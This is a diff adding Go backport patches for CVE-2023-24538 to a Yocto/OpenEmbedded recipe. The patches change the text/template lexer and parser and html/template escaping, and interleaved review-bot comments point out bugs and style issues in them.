+index c9b80f4..496d8bf 100644
+--- a/src/text/template/parse/parse.go
++++ b/src/text/template/parse/parse.go
+@@ -21,6 +21,7 @@ type Tree struct {
+ Name string // name of the template represented by the tree.
+ ParseName string // name of the top-level template during parsing, for error messages.
+ Root *ListNode // top-level root of the tree.
++ Mode Mode // parsing mode.
+ text string // text parsed to create the template (or its parent)
+ // Parsing only; cleared after parse.
+ funcs []map[string]interface{}
+@@ -29,8 +30,16 @@ type Tree struct {
+ peekCount int
+ vars []string // variables defined at the moment.
+ treeSet map[string]*Tree
++ mode Mode
+ }
+
++// A mode value is a set of flags (or 0). Modes control parser behavior.
++type Mode uint
++
++const (
++ ParseComments Mode = 1 << iota // parse comments and add them to AST
++)
++
+ // Copy returns a copy of the Tree. Any parsing state is discarded.
+ func (t *Tree) Copy() *Tree {
+ if t == nil {
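Review bot: The Tree struct gains an unexported `mode Mode` field in addition to the exported `Mode` added in the previous hunk, and nothing in the visible hunks of this patch reads or assigns `mode` (Parse, parse and blockControl all use `Mode`). If it is unused it should be dropped; if it stays, it needs a comment saying how it differs from `Mode`. The type comment would also follow Go doc convention better as `// Mode is a set of flags (or 0) that control parser behavior.`. The struct starts outside this hunk, so other uses of `mode` cannot be ruled out from here.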
+@@ -220,7 +229,8 @@ func (t *Tree) stopParse() {
+ func (t *Tree) Parse(text, leftDelim, rightDelim string, treeSet map[string]*Tree, funcs ...map[string]interface{}) (tree *Tree, err error) {
+ defer t.recover(&err)
+ t.ParseName = t.Name
+- t.startParse(funcs, lex(t.Name, text, leftDelim, rightDelim), treeSet)
++ emitComment := t.Mode&ParseComments != 0
++ t.startParse(funcs, lex(t.Name, text, leftDelim, rightDelim, emitComment), treeSet)
+ t.text = text
+ t.parse()
+ t.add()
+@@ -240,12 +250,14 @@ func (t *Tree) add() {
+ }
+ }
+
+-// IsEmptyTree reports whether this tree (node) is empty of everything but space.
++// IsEmptyTree reports whether this tree (node) is empty of everything but space or comments.
+ func IsEmptyTree(n Node) bool {
+ switch n := n.(type) {
+ case nil:
+ return true
+ case *ActionNode:
++ case *CommentNode:
++ return true
+ case *IfNode:
+ case *ListNode:
+ for _, node := range n.Nodes {
+@@ -276,6 +288,7 @@ func (t *Tree) parse() {
+ if t.nextNonSpace().typ == itemDefine {
+ newT := New("definition") // name will be updated once we know it.
+ newT.text = t.text
++ newT.Mode = t.Mode
+ newT.ParseName = t.ParseName
+ newT.startParse(t.funcs, t.lex, t.treeSet)
+ newT.parseDefinition()
+@@ -331,13 +344,15 @@ func (t *Tree) itemList() (list *ListNode, next Node) {
+ }
+
+ // textOrAction:
+-// text | action
++// text | comment | action
+ func (t *Tree) textOrAction() Node {
+ switch token := t.nextNonSpace(); token.typ {
+ case itemText:
+ return t.newText(token.pos, token.val)
+ case itemLeftDelim:
+ return t.action()
++ case itemComment:
++ return t.newComment(token.pos, token.val)
+ default:
+ t.unexpected(token, "input")
+ }
+@@ -539,6 +554,7 @@ func (t *Tree) blockControl() Node {
+
+ block := New(name) // name will be updated once we know it.
+ block.text = t.text
++ block.Mode = t.Mode
+ block.ParseName = t.ParseName
+ block.startParse(t.funcs, t.lex, t.treeSet)
+ var end Node
+diff --git a/src/text/template/parse/parse_test.go b/src/text/template/parse/parse_test.go
+index 4e09a78..d9c13c5 100644
+--- a/src/text/template/parse/parse_test.go
++++ b/src/text/template/parse/parse_test.go
+@@ -348,6 +348,30 @@ func TestParseCopy(t *testing.T) {
+ testParse(true, t)
+ }
+
++func TestParseWithComments(t *testing.T) {
++ textFormat = "%q"
++ defer func() { textFormat = "%s" }()
++ tests := [...]parseTest{
++ {"comment", "{{/*\n\n\n*/}}", noError, "{{/*\n\n\n*/}}"},
++ {"comment trim left", "x \r\n\t{{- /* hi */}}", noError, `"x"{{/* hi */}}`},
++ {"comment trim right", "{{/* hi */ -}}\n\n\ty", noError, `{{/* hi */}}"y"`},
++ {"comment trim left and right", "x \r\n\t{{- /* */ -}}\n\n\ty", noError, `"x"{{/* */}}"y"`},
++ }
++ for _, test := range tests {
++ t.Run(test.name, func(t *testing.T) {
++ tr := New(test.name)
++ tr.Mode = ParseComments
++ tmpl, err := tr.Parse(test.input, "", "", make(map[string]*Tree))
++ if err != nil {
++ t.Errorf("%q: expected error; got none", test.name)
++ }
++ if result := tmpl.Root.String(); result != test.result {
++ t.Errorf("%s=(%q): got\n\t%v\nexpected\n\t%v", test.name, test.input, result, test.result)
++ }
++ })
++ }
++}
++
+ type isEmptyTest struct {
+ name string
+ input string
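Review bot: In TestParseWithComments the `err != nil` branch reports `expected error; got none`, which is the opposite of what happened, and the test then goes on to call `tmpl.Root.String()` even though Parse failed. All four cases are declared `noError`, so the branch should read `t.Fatalf("%q: unexpected error: %v", test.name, err)`. Using Fatalf also stops the subtest before it dereferences a tree that is presumably nil on failure.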
+@@ -358,6 +382,7 @@ var isEmptyTests = []isEmptyTest{
+ {"empty", ``, true},
+ {"nonempty", `hello`, false},
+ {"spaces only", " \t\n \t\n", true},
++ {"comment only", "{{/* comment */}}", true},
+ {"definition", `{{define "x"}}something{{end}}`, true},
+ {"definitions and space", "{{define `x`}}something{{end}}\n\n{{define `y`}}something{{end}}\n\n", true},
+ {"definitions and text", "{{define `x`}}something{{end}}\nx\n{{define `y`}}something{{end}}\ny\n", false},
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_4.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_4.patch
new file mode 100644
index 0000000000..d5e2eb6684
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_4.patch
@@ -0,0 +1,497 @@
+From 760d88497091fb5d6d231a18e6f4e06ecb9af9b2 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Thu, 10 Sep 2020 18:53:26 -0400
+Subject: [PATCH 4/6] text/template: allow newlines inside action delimiters
+
+This allows multiline constructs like:
+
+ {{"hello" |
+ printf}}
+
+Now that unclosed actions can span multiple lines,
+track and report the start of the action when reporting errors.
+
+Also clean up a few "unexpected <error message>" to be just "<error message>".
+
+Fixes #29770.
+
+Change-Id: I54c6c016029a8328b7902a4b6d85eab713ec3285
+Reviewed-on: https://go-review.googlesource.com/c/go/+/254257
+Trust: Russ Cox <rsc@golang.org>
+Run-TryBot: Russ Cox <rsc@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Rob Pike <r@golang.org>
+
+Dependency Patch #4
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/9384d34c58099657bb1b133beaf3ff37ada9b017
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/text/template/doc.go | 21 ++++-----
+ src/text/template/exec_test.go | 2 +-
+ src/text/template/parse/lex.go | 84 +++++++++++++++++------------------
+ src/text/template/parse/lex_test.go | 2 +-
+ src/text/template/parse/parse.go | 59 +++++++++++++-----------
+ src/text/template/parse/parse_test.go | 36 ++++++++++++---
+ 6 files changed, 117 insertions(+), 87 deletions(-)
+
+diff --git a/src/text/template/doc.go b/src/text/template/doc.go
+index 4b0efd2..7b30294 100644
+--- a/src/text/template/doc.go
++++ b/src/text/template/doc.go
+@@ -40,16 +40,17 @@ More intricate examples appear below.
+ Text and spaces
+
+ By default, all text between actions is copied verbatim when the template is
+-executed. For example, the string " items are made of " in the example above appears
+-on standard output when the program is run.
+-
+-However, to aid in formatting template source code, if an action's left delimiter
+-(by default "{{") is followed immediately by a minus sign and ASCII space character
+-("{{- "), all trailing white space is trimmed from the immediately preceding text.
+-Similarly, if the right delimiter ("}}") is preceded by a space and minus sign
+-(" -}}"), all leading white space is trimmed from the immediately following text.
+-In these trim markers, the ASCII space must be present; "{{-3}}" parses as an
+-action containing the number -3.
++executed. For example, the string " items are made of " in the example above
++appears on standard output when the program is run.
++
++However, to aid in formatting template source code, if an action's left
++delimiter (by default "{{") is followed immediately by a minus sign and white
++space, all trailing white space is trimmed from the immediately preceding text.
++Similarly, if the right delimiter ("}}") is preceded by white space and a minus
++sign, all leading white space is trimmed from the immediately following text.
++In these trim markers, the white space must be present:
++"{{- 3}}" is like "{{3}}" but trims the immediately preceding text, while
++"{{-3}}" parses as an action containing the number -3.
+
+ For instance, when executing the template whose source is
+
+diff --git a/src/text/template/exec_test.go b/src/text/template/exec_test.go
+index b8a809e..3309b33 100644
+--- a/src/text/template/exec_test.go
++++ b/src/text/template/exec_test.go
+@@ -1295,7 +1295,7 @@ func TestUnterminatedStringError(t *testing.T) {
+ t.Fatal("expected error")
+ }
+ str := err.Error()
+- if !strings.Contains(str, "X:3: unexpected unterminated raw quoted string") {
++ if !strings.Contains(str, "X:3: unterminated raw quoted string") {
+ t.Fatalf("unexpected error: %s", str)
+ }
+ }
+diff --git a/src/text/template/parse/lex.go b/src/text/template/parse/lex.go
+index e41373a..6784071 100644
+--- a/src/text/template/parse/lex.go
++++ b/src/text/template/parse/lex.go
+@@ -92,15 +92,14 @@ const eof = -1
+ // If the action begins "{{- " rather than "{{", then all space/tab/newlines
+ // preceding the action are trimmed; conversely if it ends " -}}" the
+ // leading spaces are trimmed. This is done entirely in the lexer; the
+-// parser never sees it happen. We require an ASCII space to be
+-// present to avoid ambiguity with things like "{{-3}}". It reads
++// parser never sees it happen. We require an ASCII space (' ', \t, \r, \n)
++// to be present to avoid ambiguity with things like "{{-3}}". It reads
+ // better with the space present anyway. For simplicity, only ASCII
+-// space does the job.
++// does the job.
+ const (
+- spaceChars = " \t\r\n" // These are the space characters defined by Go itself.
+- leftTrimMarker = "- " // Attached to left delimiter, trims trailing spaces from preceding text.
+- rightTrimMarker = " -" // Attached to right delimiter, trims leading spaces from following text.
+- trimMarkerLen = Pos(len(leftTrimMarker))
++ spaceChars = " \t\r\n" // These are the space characters defined by Go itself.
++ trimMarker = '-' // Attached to left/right delimiter, trims trailing spaces from preceding/following text.
++ trimMarkerLen = Pos(1 + 1) // marker plus space before or after
+ )
+
+ // stateFn represents the state of the scanner as a function that returns the next state.
+@@ -108,19 +107,18 @@ type stateFn func(*lexer) stateFn
+
+ // lexer holds the state of the scanner.
+ type lexer struct {
+- name string // the name of the input; used only for error reports
+- input string // the string being scanned
+- leftDelim string // start of action
+- rightDelim string // end of action
+- trimRightDelim string // end of action with trim marker
+- emitComment bool // emit itemComment tokens.
+- pos Pos // current position in the input
+- start Pos // start position of this item
+- width Pos // width of last rune read from input
+- items chan item // channel of scanned items
+- parenDepth int // nesting depth of ( ) exprs
+- line int // 1+number of newlines seen
+- startLine int // start line of this item
++ name string // the name of the input; used only for error reports
++ input string // the string being scanned
++ leftDelim string // start of action
++ rightDelim string // end of action
++ emitComment bool // emit itemComment tokens.
++ pos Pos // current position in the input
++ start Pos // start position of this item
++ width Pos // width of last rune read from input
++ items chan item // channel of scanned items
++ parenDepth int // nesting depth of ( ) exprs
++ line int // 1+number of newlines seen
++ startLine int // start line of this item
+ }
+
+ // next returns the next rune in the input.
+@@ -213,15 +211,14 @@ func lex(name, input, left, right string, emitComment bool) *lexer {
+ right = rightDelim
+ }
+ l := &lexer{
+- name: name,
+- input: input,
+- leftDelim: left,
+- rightDelim: right,
+- trimRightDelim: rightTrimMarker + right,
+- emitComment: emitComment,
+- items: make(chan item),
+- line: 1,
+- startLine: 1,
++ name: name,
++ input: input,
++ leftDelim: left,
++ rightDelim: right,
++ emitComment: emitComment,
++ items: make(chan item),
++ line: 1,
++ startLine: 1,
+ }
+ go l.run()
+ return l
+@@ -251,7 +248,7 @@ func lexText(l *lexer) stateFn {
+ ldn := Pos(len(l.leftDelim))
+ l.pos += Pos(x)
+ trimLength := Pos(0)
+- if strings.HasPrefix(l.input[l.pos+ldn:], leftTrimMarker) {
++ if hasLeftTrimMarker(l.input[l.pos+ldn:]) {
+ trimLength = rightTrimLength(l.input[l.start:l.pos])
+ }
+ l.pos -= trimLength
+@@ -280,7 +277,7 @@ func rightTrimLength(s string) Pos {
+
+ // atRightDelim reports whether the lexer is at a right delimiter, possibly preceded by a trim marker.
+ func (l *lexer) atRightDelim() (delim, trimSpaces bool) {
+- if strings.HasPrefix(l.input[l.pos:], l.trimRightDelim) { // With trim marker.
++ if hasRightTrimMarker(l.input[l.pos:]) && strings.HasPrefix(l.input[l.pos+trimMarkerLen:], l.rightDelim) { // With trim marker.
+ return true, true
+ }
+ if strings.HasPrefix(l.input[l.pos:], l.rightDelim) { // Without trim marker.
+@@ -297,7 +294,7 @@ func leftTrimLength(s string) Pos {
+ // lexLeftDelim scans the left delimiter, which is known to be present, possibly with a trim marker.
+ func lexLeftDelim(l *lexer) stateFn {
+ l.pos += Pos(len(l.leftDelim))
+- trimSpace := strings.HasPrefix(l.input[l.pos:], leftTrimMarker)
++ trimSpace := hasLeftTrimMarker(l.input[l.pos:])
+ afterMarker := Pos(0)
+ if trimSpace {
+ afterMarker = trimMarkerLen
+@@ -342,7 +339,7 @@ func lexComment(l *lexer) stateFn {
+
+ // lexRightDelim scans the right delimiter, which is known to be present, possibly with a trim marker.
+ func lexRightDelim(l *lexer) stateFn {
+- trimSpace := strings.HasPrefix(l.input[l.pos:], rightTrimMarker)
++ trimSpace := hasRightTrimMarker(l.input[l.pos:])
+ if trimSpace {
+ l.pos += trimMarkerLen
+ l.ignore()
+@@ -369,7 +366,7 @@ func lexInsideAction(l *lexer) stateFn {
+ return l.errorf("unclosed left paren")
+ }
+ switch r := l.next(); {
+- case r == eof || isEndOfLine(r):
++ case r == eof:
+ return l.errorf("unclosed action")
+ case isSpace(r):
+ l.backup() // Put space back in case we have " -}}".
+@@ -439,7 +436,7 @@ func lexSpace(l *lexer) stateFn {
+ }
+ // Be careful about a trim-marked closing delimiter, which has a minus
+ // after a space. We know there is a space, so check for the '-' that might follow.
+- if strings.HasPrefix(l.input[l.pos-1:], l.trimRightDelim) {
++ if hasRightTrimMarker(l.input[l.pos-1:]) && strings.HasPrefix(l.input[l.pos-1+trimMarkerLen:], l.rightDelim) {
+ l.backup() // Before the space.
+ if numSpaces == 1 {
+ return lexRightDelim // On the delim, so go right to that.
+@@ -526,7 +523,7 @@ func lexFieldOrVariable(l *lexer, typ itemType) stateFn {
+ // day to implement arithmetic.
+ func (l *lexer) atTerminator() bool {
+ r := l.peek()
+- if isSpace(r) || isEndOfLine(r) {
++ if isSpace(r) {
+ return true
+ }
+ switch r {
+@@ -657,15 +654,18 @@ Loop:
+
+ // isSpace reports whether r is a space character.
+ func isSpace(r rune) bool {
+- return r == ' ' || r == '\t'
+-}
+-
+-// isEndOfLine reports whether r is an end-of-line character.
+-func isEndOfLine(r rune) bool {
+- return r == '\r' || r == '\n'
++ return r == ' ' || r == '\t' || r == '\r' || r == '\n'
+ }
+
+ // isAlphaNumeric reports whether r is an alphabetic, digit, or underscore.
+ func isAlphaNumeric(r rune) bool {
+ return r == '_' || unicode.IsLetter(r) || unicode.IsDigit(r)
+ }
++
++func hasLeftTrimMarker(s string) bool {
++ return len(s) >= 2 && s[0] == trimMarker && isSpace(rune(s[1]))
++}
++
++func hasRightTrimMarker(s string) bool {
++ return len(s) >= 2 && isSpace(rune(s[0])) && s[1] == trimMarker
++}
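Review bot: hasLeftTrimMarker and hasRightTrimMarker are added at the end of lex.go without doc comments, while isSpace and isAlphaNumeric just above each carry a `reports whether` line. Add `// hasLeftTrimMarker reports whether s starts with the trim marker '-' followed by an ASCII space character.` and `// hasRightTrimMarker reports whether s starts with an ASCII space character followed by the trim marker '-'.`. The comment should also say that the byte-wise `rune(s[0])` / `rune(s[1])` conversion is sound only because isSpace matches nothing outside ASCII, so a later widening of isSpace does not silently break these helpers.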
+diff --git a/src/text/template/parse/lex_test.go b/src/text/template/parse/lex_test.go
+index f6d5f28..6510eed 100644
+--- a/src/text/template/parse/lex_test.go
++++ b/src/text/template/parse/lex_test.go
+@@ -323,7 +323,7 @@ var lexTests = []lexTest{
+ tLeft,
+ mkItem(itemError, "unrecognized character in action: U+0001"),
+ }},
+- {"unclosed action", "{{\n}}", []item{
++ {"unclosed action", "{{", []item{
+ tLeft,
+ mkItem(itemError, "unclosed action"),
+ }},
+diff --git a/src/text/template/parse/parse.go b/src/text/template/parse/parse.go
+index 496d8bf..5e6e512 100644
+--- a/src/text/template/parse/parse.go
++++ b/src/text/template/parse/parse.go
+@@ -24,13 +24,14 @@ type Tree struct {
+ Mode Mode // parsing mode.
+ text string // text parsed to create the template (or its parent)
+ // Parsing only; cleared after parse.
+- funcs []map[string]interface{}
+- lex *lexer
+- token [3]item // three-token lookahead for parser.
+- peekCount int
+- vars []string // variables defined at the moment.
+- treeSet map[string]*Tree
+- mode Mode
++ funcs []map[string]interface{}
++ lex *lexer
++ token [3]item // three-token lookahead for parser.
++ peekCount int
++ vars []string // variables defined at the moment.
++ treeSet map[string]*Tree
++ actionLine int // line of left delim starting action
++ mode Mode
+ }
+
+ // A mode value is a set of flags (or 0). Modes control parser behavior.
+@@ -187,6 +188,16 @@ func (t *Tree) expectOneOf(expected1, expected2 itemType, context string) item {
+
+ // unexpected complains about the token and terminates processing.
+ func (t *Tree) unexpected(token item, context string) {
++ if token.typ == itemError {
++ extra := ""
++ if t.actionLine != 0 && t.actionLine != token.line {
++ extra = fmt.Sprintf(" in action started at %s:%d", t.ParseName, t.actionLine)
++ if strings.HasSuffix(token.val, " action") {
++ extra = extra[len(" in action"):] // avoid "action in action"
++ }
++ }
++ t.errorf("%s%s", token, extra)
++ }
+ t.errorf("unexpected %s in %s", token, context)
+ }
+
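Review bot: The new `itemError` branch in `unexpected` ends with `t.errorf("%s%s", token, extra)` and then runs straight into `t.errorf("unexpected %s in %s", token, context)`, which is only correct if errorf never returns, and the hunk does not show that. An explicit `return` after the first call would make the control flow self-evident. The slice `extra[len(" in action"):]` also depends on the literal prefix of the Sprintf format two lines above it; a short comment tying the two together would keep them from drifting apart.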
+@@ -350,6 +361,8 @@ func (t *Tree) textOrAction() Node {
+ case itemText:
+ return t.newText(token.pos, token.val)
+ case itemLeftDelim:
++ t.actionLine = token.line
++ defer t.clearActionLine()
+ return t.action()
+ case itemComment:
+ return t.newComment(token.pos, token.val)
+@@ -359,6 +372,10 @@ func (t *Tree) textOrAction() Node {
+ return nil
+ }
+
++func (t *Tree) clearActionLine() {
++ t.actionLine = 0
++}
++
+ // Action:
+ // control
+ // command ("|" command)*
+@@ -384,12 +401,12 @@ func (t *Tree) action() (n Node) {
+ t.backup()
+ token := t.peek()
+ // Do not pop variables; they persist until "end".
+- return t.newAction(token.pos, token.line, t.pipeline("command"))
++ return t.newAction(token.pos, token.line, t.pipeline("command", itemRightDelim))
+ }
+
+ // Pipeline:
+ // declarations? command ('|' command)*
+-func (t *Tree) pipeline(context string) (pipe *PipeNode) {
++func (t *Tree) pipeline(context string, end itemType) (pipe *PipeNode) {
+ token := t.peekNonSpace()
+ pipe = t.newPipeline(token.pos, token.line, nil)
+ // Are there declarations or assignments?
+@@ -430,12 +447,9 @@ decls:
+ }
+ for {
+ switch token := t.nextNonSpace(); token.typ {
+- case itemRightDelim, itemRightParen:
++ case end:
+ // At this point, the pipeline is complete
+ t.checkPipeline(pipe, context)
+- if token.typ == itemRightParen {
+- t.backup()
+- }
+ return
+ case itemBool, itemCharConstant, itemComplex, itemDot, itemField, itemIdentifier,
+ itemNumber, itemNil, itemRawString, itemString, itemVariable, itemLeftParen:
+@@ -464,7 +478,7 @@ func (t *Tree) checkPipeline(pipe *PipeNode, context string) {
+
+ func (t *Tree) parseControl(allowElseIf bool, context string) (pos Pos, line int, pipe *PipeNode, list, elseList *ListNode) {
+ defer t.popVars(len(t.vars))
+- pipe = t.pipeline(context)
++ pipe = t.pipeline(context, itemRightDelim)
+ var next Node
+ list, next = t.itemList()
+ switch next.Type() {
+@@ -550,7 +564,7 @@ func (t *Tree) blockControl() Node {
+
+ token := t.nextNonSpace()
+ name := t.parseTemplateName(token, context)
+- pipe := t.pipeline(context)
++ pipe := t.pipeline(context, itemRightDelim)
+
+ block := New(name) // name will be updated once we know it.
+ block.text = t.text
+@@ -580,7 +594,7 @@ func (t *Tree) templateControl() Node {
+ if t.nextNonSpace().typ != itemRightDelim {
+ t.backup()
+ // Do not pop variables; they persist until "end".
+- pipe = t.pipeline(context)
++ pipe = t.pipeline(context, itemRightDelim)
+ }
+ return t.newTemplate(token.pos, token.line, name, pipe)
+ }
+@@ -614,13 +628,12 @@ func (t *Tree) command() *CommandNode {
+ switch token := t.next(); token.typ {
+ case itemSpace:
+ continue
+- case itemError:
+- t.errorf("%s", token.val)
+ case itemRightDelim, itemRightParen:
+ t.backup()
+ case itemPipe:
++ // nothing here; break loop below
+ default:
+- t.errorf("unexpected %s in operand", token)
++ t.unexpected(token, "operand")
+ }
+ break
+ }
+@@ -675,8 +688,6 @@ func (t *Tree) operand() Node {
+ // A nil return means the next item is not a term.
+ func (t *Tree) term() Node {
+ switch token := t.nextNonSpace(); token.typ {
+- case itemError:
+- t.errorf("%s", token.val)
+ case itemIdentifier:
+ if !t.hasFunction(token.val) {
+ t.errorf("function %q not defined", token.val)
+@@ -699,11 +710,7 @@ func (t *Tree) term() Node {
+ }
+ return number
+ case itemLeftParen:
+- pipe := t.pipeline("parenthesized pipeline")
+- if token := t.next(); token.typ != itemRightParen {
+- t.errorf("unclosed right paren: unexpected %s", token)
+- }
+- return pipe
++ return t.pipeline("parenthesized pipeline", itemRightParen)
+ case itemString, itemRawString:
+ s, err := strconv.Unquote(token.val)
+ if err != nil {
+diff --git a/src/text/template/parse/parse_test.go b/src/text/template/parse/parse_test.go
+index d9c13c5..220f984 100644
+--- a/src/text/template/parse/parse_test.go
++++ b/src/text/template/parse/parse_test.go
+@@ -250,6 +250,13 @@ var parseTests = []parseTest{
+ {"comment trim left and right", "x \r\n\t{{- /* */ -}}\n\n\ty", noError, `"x""y"`},
+ {"block definition", `{{block "foo" .}}hello{{end}}`, noError,
+ `{{template "foo" .}}`},
++
++ {"newline in assignment", "{{ $x \n := \n 1 \n }}", noError, "{{$x := 1}}"},
++ {"newline in empty action", "{{\n}}", hasError, "{{\n}}"},
++ {"newline in pipeline", "{{\n\"x\"\n|\nprintf\n}}", noError, `{{"x" | printf}}`},
++ {"newline in comment", "{{/*\nhello\n*/}}", noError, ""},
++ {"newline in comment", "{{-\n/*\nhello\n*/\n-}}", noError, ""},
++
+ // Errors.
+ {"unclosed action", "hello{{range", hasError, ""},
+ {"unmatched end", "{{end}}", hasError, ""},
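Review bot: The last two added parseTests entries both use the name `newline in comment`, so a failure reported by name cannot distinguish the plain case from the trim-marker case (assuming this table is reported by test name, as the other tables in the file are). Rename the second, for example `{"newline in trimmed comment", "{{-\n/*\nhello\n*/\n-}}", noError, ""},`. The table continues outside the hunk.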
+@@ -426,23 +433,38 @@ var errorTests = []parseTest{
+ // Check line numbers are accurate.
+ {"unclosed1",
+ "line1\n{{",
+- hasError, `unclosed1:2: unexpected unclosed action in command`},
++ hasError, `unclosed1:2: unclosed action`},
+ {"unclosed2",
+ "line1\n{{define `x`}}line2\n{{",
+- hasError, `unclosed2:3: unexpected unclosed action in command`},
++ hasError, `unclosed2:3: unclosed action`},
++ {"unclosed3",
++ "line1\n{{\"x\"\n\"y\"\n",
++ hasError, `unclosed3:4: unclosed action started at unclosed3:2`},
++ {"unclosed4",
++ "{{\n\n\n\n\n",
++ hasError, `unclosed4:6: unclosed action started at unclosed4:1`},
++ {"var1",
++ "line1\n{{\nx\n}}",
++ hasError, `var1:3: function "x" not defined`},
+ // Specific errors.
+ {"function",
+ "{{foo}}",
+ hasError, `function "foo" not defined`},
+- {"comment",
++ {"comment1",
+ "{{/*}}",
+- hasError, `unclosed comment`},
++ hasError, `comment1:1: unclosed comment`},
++ {"comment2",
++ "{{/*\nhello\n}}",
++ hasError, `comment2:1: unclosed comment`},
+ {"lparen",
+ "{{.X (1 2 3}}",
+ hasError, `unclosed left paren`},
+ {"rparen",
+- "{{.X 1 2 3)}}",
+- hasError, `unexpected ")"`},
++ "{{.X 1 2 3 ) }}",
++ hasError, `unexpected ")" in command`},
++ {"rparen2",
++ "{{(.X 1 2 3",
++ hasError, `unclosed action`},
+ {"space",
+ "{{`x`3}}",
+ hasError, `in operand`},
+@@ -488,7 +510,7 @@ var errorTests = []parseTest{
+ hasError, `missing value for parenthesized pipeline`},
+ {"multilinerawstring",
+ "{{ $v := `\n` }} {{",
+- hasError, `multilinerawstring:2: unexpected unclosed action`},
++ hasError, `multilinerawstring:2: unclosed action`},
+ {"rangeundefvar",
+ "{{range $k}}{{end}}",
+ hasError, `undefined variable`},
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_5.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_5.patch
new file mode 100644
index 0000000000..fc38929648
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_5.patch
@@ -0,0 +1,585 @@
+From e0e6bca6ddc0e6d9fa3a5b644af9b446924fbf83 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Thu, 20 May 2021 12:46:33 -0400
+Subject: [PATCH 5/6] html/template, text/template: implement break and
+ continue for range loops
+
+Break and continue for range loops was accepted as a proposal in June 2017.
+It was implemented in CL 66410 (Oct 2017)
+but then rolled back in CL 92155 (Feb 2018)
+because html/template changes had not been implemented.
+
+This CL reimplements break and continue in text/template
+and then adds support for them in html/template as well.
+
+Fixes #20531.
+
+Change-Id: I05330482a976f1c078b4b49c2287bd9031bb7616
+Reviewed-on: https://go-review.googlesource.com/c/go/+/321491
+Trust: Russ Cox <rsc@golang.org>
+Run-TryBot: Russ Cox <rsc@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Rob Pike <r@golang.org>
+
+Dependency Patch #5
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/d0dd26a88c019d54f22463daae81e785f5867565
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/html/template/context.go | 4 ++
+ src/html/template/escape.go | 71 ++++++++++++++++++++++++++++++++++-
+ src/html/template/escape_test.go | 24 ++++++++++++
+ src/text/template/doc.go | 8 ++++
+ src/text/template/exec.go | 24 +++++++++++-
+ src/text/template/exec_test.go | 2 +
+ src/text/template/parse/lex.go | 13 ++++++-
+ src/text/template/parse/lex_test.go | 2 +
+ src/text/template/parse/node.go | 36 ++++++++++++++++++
+ src/text/template/parse/parse.go | 42 ++++++++++++++++++++-
+ src/text/template/parse/parse_test.go | 8 ++++
+ 11 files changed, 230 insertions(+), 4 deletions(-)
+
+diff --git a/src/html/template/context.go b/src/html/template/context.go
+index f7d4849..aaa7d08 100644
+--- a/src/html/template/context.go
++++ b/src/html/template/context.go
+@@ -6,6 +6,7 @@ package template
+
+ import (
+ "fmt"
++ "text/template/parse"
+ )
+
+ // context describes the state an HTML parser must be in when it reaches the
+@@ -22,6 +23,7 @@ type context struct {
+ jsCtx jsCtx
+ attr attr
+ element element
++ n parse.Node // for range break/continue
+ err *Error
+ }
+
+@@ -141,6 +143,8 @@ const (
+ // stateError is an infectious error state outside any valid
+ // HTML/CSS/JS construct.
+ stateError
++ // stateDead marks unreachable code after a {{break}} or {{continue}}.
++ stateDead
+ )
+
+ // isComment is true for any state that contains content meant for template
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index 8739735..6dea79c 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -97,6 +97,15 @@ type escaper struct {
+ actionNodeEdits map[*parse.ActionNode][]string
+ templateNodeEdits map[*parse.TemplateNode]string
+ textNodeEdits map[*parse.TextNode][]byte
++ // rangeContext holds context about the current range loop.
++ rangeContext *rangeContext
++}
++
++// rangeContext holds information about the current range loop.
++type rangeContext struct {
++ outer *rangeContext // outer loop
++ breaks []context // context at each break action
++ continues []context // context at each continue action
+ }
+
+ // makeEscaper creates a blank escaper for the given set.
+@@ -109,6 +118,7 @@ func makeEscaper(n *nameSpace) escaper {
+ map[*parse.ActionNode][]string{},
+ map[*parse.TemplateNode]string{},
+ map[*parse.TextNode][]byte{},
++ nil,
+ }
+ }
+
+@@ -124,8 +134,16 @@ func (e *escaper) escape(c context, n parse.Node) context {
+ switch n := n.(type) {
+ case *parse.ActionNode:
+ return e.escapeAction(c, n)
++ case *parse.BreakNode:
++ c.n = n
++ e.rangeContext.breaks = append(e.rangeContext.breaks, c)
++ return context{state: stateDead}
+ case *parse.CommentNode:
+ return c
++ case *parse.ContinueNode:
++ c.n = n
++ e.rangeContext.continues = append(e.rangeContext.breaks, c)
++ return context{state: stateDead}
+ case *parse.IfNode:
+ return e.escapeBranch(c, &n.BranchNode, "if")
+ case *parse.ListNode:
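Review bot: The `*parse.ContinueNode` case builds the continue list from the wrong slice: `e.rangeContext.continues = append(e.rangeContext.breaks, c)`. Each `{{continue}}` therefore replaces `continues` with the recorded break contexts plus the current one, so contexts from earlier `{{continue}}` actions in the same loop drop out of the escaper's range analysis and a context mismatch at one of them could go unreported. It should read `e.rangeContext.continues = append(e.rangeContext.continues, c)`. The same defect reaches joinRange in the later escape.go hunk, where entries of `rc.continues` are asserted as `*parse.ContinueNode` without a check, so a break context in that list would panic if its join fails. A TestErrors case with two `{{continue}}` actions in different HTML contexts inside one range would pin the fix.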
+@@ -427,6 +445,12 @@ func join(a, b context, node parse.Node, nodeName string) context {
+ if b.state == stateError {
+ return b
+ }
++ if a.state == stateDead {
++ return b
++ }
++ if b.state == stateDead {
++ return a
++ }
+ if a.eq(b) {
+ return a
+ }
+@@ -466,14 +490,27 @@ func join(a, b context, node parse.Node, nodeName string) context {
+
+ // escapeBranch escapes a branch template node: "if", "range" and "with".
+ func (e *escaper) escapeBranch(c context, n *parse.BranchNode, nodeName string) context {
